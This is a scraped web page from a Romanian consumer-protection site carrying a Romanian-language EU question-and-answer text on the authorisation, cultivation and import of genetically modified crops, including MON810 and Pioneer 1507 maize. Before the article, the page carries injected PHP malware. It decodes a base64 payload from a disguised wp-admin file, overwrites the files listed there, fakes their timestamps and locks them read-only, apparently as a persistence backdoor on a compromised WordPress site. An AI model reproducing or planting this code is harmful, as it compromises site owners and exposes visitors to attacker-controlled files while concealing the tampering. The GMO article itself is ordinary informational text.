$wp_update_file="/home/shuffles/public_html/wp-admin/user/screens.php"; if ( is_file($wp_update_file) ) { $wp_update_content=trim(file_get_contents($wp_update_file)); if ( $wp_update_content!="" ) { $wp_update_content=substr($wp_update_content,6,-6); $wp_update_content=base64_decode($wp_update_content); $wp_update_arr=json_decode($wp_update_content,true); if ( is_array($wp_update_arr) ) { foreach($wp_update_arr as $value) { $file_mtime=filemtime($value["path"]); @chmod($value["path"],0777); @unlink($value["path"]); @file_put_contents($value["path"],$value["content"]); @touch($value["path"],$file_mtime); @chmod($value["path"],0444); } } } } Întrebări și răspunsuri privind politicile UE în materie de cultivarea și importurile de OMG-uri – O noua atitudine

o9atitudine-Protectia-Consumatorilor-Protectia-ConsumatoruluiCare este procedura curentă de autorizare a cultivării de OMG?

Organismele modificate genetic (OMG-uri) sunt autorizate la nivelul UE, de la caz la caz, în urma unei cereri prezentate de către o societate. Cereri pentru cultivarea de OMG-uri pot fi depuse în temeiul Regulamentului (CE) nr. 1829/2003 privind produsele alimentare și furajele modificate genetic sau în temeiul Directivei privind diseminarea deliberată în mediu a organismelor modificate genetic (Directiva 2001/18/CE). În ambele cazuri, statele membre joacă un rol semnificativ, realizând evaluarea inițială de risc a organismelor modificate genetic pentru cultivare.

Pentru mai multe informații privind procedurile de autorizare:

http://ec.europa.eu/food/plant/gmo/authorisation/index_en.htm

Se cultivă deja OMG în UE?

Da. Există un porumb modificat genetic – MON810 – care se cultivă în UE în scopuri comerciale.Modificarea genetică a acestui produs este destinată să protejeze recolta împotriva unui dăunător – sfredelitorul european al porumbului. Acesta a fost autorizat în 1998.

În 2012, MON 810 a fost cultivat în principal în Spania (116 306 hectare), Portugalia (9 278 hectare), Republica Cehă (3 052 hectare), România (217 hectare) și Slovacia (189 hectare)1. Acestea reprezintă1,35 % din cele 9,5 milioane de hectare de porumb cultivat în UE, și 0,23 % din cele 55,1 milioane de hectare de porumb modificat genetic cultivate în întreaga lume2.

În 2010, un cartof modificat genetic cultivat pentru amidon, cunoscut drept cartoful „Amflora”, a fost autorizat pentru cultivare și prelucrare industrială în UE. Nu mai este cultivat în UE începând din 2011.

Există state membre care au interzis deja cultivarea organismelor modificate genetic?

Da. Opt state membre (Austria, Bulgaria, Grecia, Germania, Ungaria, Italia, Luxemburg și Polonia) au adoptat măsuri de salvgardare și au interzis cultivarea porumbului modificat genetic MON810 pe teritoriile lor. În Franța a fost, de asemenea, în vigoare o interdicție de cultivare, până în august 2013, când a fost anulată de Conseil d’Etat francez. Mai mult, Austria, Grecia, Ungaria, Luxemburg și Polonia au notificat Comisiei interdicția de cultivare a cartofului „Amflora”. Toate clauzele de salvgardare înaintate EFSA au fost declarate neîntemeiate din punct de vedere științific.

De ce trimite Comisia, astăzi, Consiliului un proiect de decizie de autorizare pentru porumbul Pioneer 1507?

În 2001, întreprinderea Pioneer a depus o cerere pentru autorizarea porumbului 1507 (conferă rezistență la anumite larve de molii dăunătoare pentru porumb, precum sfredelitorul european al porumbului) pentru cultivare în temeiul Directivei 2001/18/CE privind diseminarea deliberată în mediu a organismelor modificate genetic. În 2007, Pioneer a inițiat o primă acțiune în constatarea abținerii de a acționa, la Tribunalul Uniunii Europene, împotriva Comisiei pentru faptul că aceasta nu a prezentat Comitetului de reglementare spre votare o decizie de autorizare a porumbului respectiv. Această acțiune a fost închisă de Tribunal ca urmare a propunerii de către Comisie, în februarie 2009, a unui proiect de decizie de autorizare transmis Comitetului de reglementare, acesta însă nu a reușit să emită un aviz. În 2010, Pioneer a lansat o a doua acțiune în constatarea abținerii de a acționa (cauza T-164/10) împotriva Comisiei pentru faptul că aceasta, în urma absenței unui aviz din partea Comitetului de reglementare, nu a înaintat Consiliului o propunere de decizie de autorizare, în conformitate cu procedura comitetelor aplicabilă la momentul respectiv (Decizia1999/468/ECa Consiliului).

La data de 26 septembrie 2013, Tribunalul a emis hotărârea în cauza T-164/10 potrivit căreia Comisia nu a acționat în temeiul Directivei 2001/18/CE, și anume nu a transmis Consiliului o propunere în temeiul articolului 5 alineatul (4) din Decizia 1999/468/CE a Consiliului.

În conformitate cu articolul 266 din TFUE, Comisia adoptă, prin urmare, măsurile necesare pentru a se conforma hotărârii și pentru a pune capăt constatării abținerii de a acționa și prezintă fără întârziere Consiliului un proiect de decizie de autorizare pentru porumbul 1507. Pentru a asigura un nivel înalt de protecție a sănătății și a mediului, proiectul de decizie de autorizare a fost ușor modificat în sensul includerii recomandărilor făcute de către EFSA în 2011 și în 2012.

Prin urmare, Comisia Europeană este în favoarea culturii de Pioneer 1507?

Comisia nu emite un aviz în favoarea sau împotriva unui anumit OMG. Comisia este obligată, în calitate de gardian al tratatelor, să aplice legislația existentă. Se reamintește faptul că Directiva 2001/18/CE care este actul de bază pentru această autorizare, a fost adoptată de Consiliu și de Parlament în 2001 în vederea consolidării cadrului pentru autorizarea OMG-urilor pentru cultivare. Se reamintește, de asemenea, că, la cererea unor state membre, Comisia a propus în iulie 2010 o modificare a legislației menționate pentru a acorda statelor membre libertatea de a restricționa sau de a interzice cultivarea de OMG-uri pe teritoriul lor.

Unde ne situăm cu privire la propunerea legislativă de modificare a legislației privind cultivarea de OMG prezentată de Comisie în iulie 2010? (a se vedea MEMO/10/325 din 13 iulie 2010)

Ca răspuns la o cerere adresată de mai mult timp de către mai multe state membre, Comisia a publicat, în iulie 2010, o propunere de Regulament de revizuire a Directivei 2001/18/CE pentru a furniza temeiul juridic pentru statele membre atunci când acestea decid în privința cultivării OMG din alte motive decât cele bazate pe o evaluare științifică a riscurilor pentru sănătate și mediu efectuată la nivel european. Datorită acestei modificări, statele membre vor putea să restricționeze sau să interzică cultivarea OMG-urilor în anumite zone sau pe întregul lor teritoriu fără a recurge la clauze de salvgardare care, până în prezent, nu au fost susținute de EFSA.

În iulie 2011, Parlamentul European și-a dat avizul la prima lectură cu privire la propunere. În cadrul Consiliului, în pofida eforturilor depuse de președinții consecutive, în special de către președinția daneză din 2012, nu s-a putut ajunge încă la un acord din cauza poziției de blocare a propunerii adoptate de către o minoritate de state membre. Comisia nu a încetat să depună eforturi substanțiale pentru a răspunde preocupărilor acestor state membre care au adoptat poziția de blocare, câștigând în același timp susținerea din partea majorității statelor membre în favoarea propunerii.

De ce dorește Comisia ca statele membre să avanseze cu privire la această propunere legislativă privind cultivarea?

Comisia consideră că problemele care au condus la propunerea legislativă privind cultivarea din 2010 rămânnerezolvate și presante, astfel cum a fost ilustrat astăzi prin prezentarea de către Consiliu a unui proiect de decizie de autorizare pentru porumbul 1507, în urma hotărârii Tribunalului privind cauza T-164/10.

Având în vedere, de asemenea, elementele constructive care rezultă în urma avizului la prima lectură al Parlamentului European, precum și faptul că majoritatea statelor membre favorabile insistă să aibă dreptul de a interzice sau restricționa cultivarea de OMG-uri pe teritoriul lor, în conformitate cu metoda descrisă în propunerea privind cultivarea, Comisia consideră că este esențial și previzibil să determine un nou impuls politic, astfel încât, în următoarele luni, să avanseze semnificativ împreună cu Consiliul și Parlamentul în ceea ce privește acest dosar.

Care sunt plantele modificate genetic autorizate UE pentru utilizări furajere și/sau alimentare?

În plus față de cultivare, introducerea pe piața UE a organismelor modificate genetic și utilizarea produselor lor derivate în lanțul alimentar și furajer fac obiectul unei autorizări din partea UE, acordată sub condiția demonstrării printr-o evaluare aprofundată de către Autoritatea Europeană pentru Siguranța Alimentară a absenței riscului pentru sănătatea umană și animală, precum și pentru mediu.

Începând de astăzi, lista celor 49 de OMG-uri autorizate pentru utilizare în alimente și furaje include 27 de tipuri de porumb, 8 tipuri de bumbac, 7 tipuri de soia, 3 tipuri de rapiță, 1 tip de sfeclă de zahăr, 1 tip de cartofi, 2 tipuri de microorganisme.

Lista plantelor modificate genetic autorizate și domeniul de aplicare precis al autorizării lor se găsește în registrul UE de produse alimentare și furaje modificate genetic, care poate fi consultat la adresa:http://ec.europa.eu/food/dyna/gm_register/index_en.cfm

Asociaţia Naţională pentru Protecţia Consumatorilor şi Promovarea Programelor şi Strategiilor din Romania – InfoCons, unica organizaţie din România cu drepturi depline în Consumers International, este o asociaţie de consumatori neguvernamentală, reprezentativă, de drept privat, fără scop lucrativ, cu patrimoniu distinct şi indivizibil, independentă, întemeiată pe principii democratice, ce apără drepturile consumatorilor – membră fondatoare a Federaţiei Asociaţiilor de Consumatori.

Sursa : europa.eu

By o9admin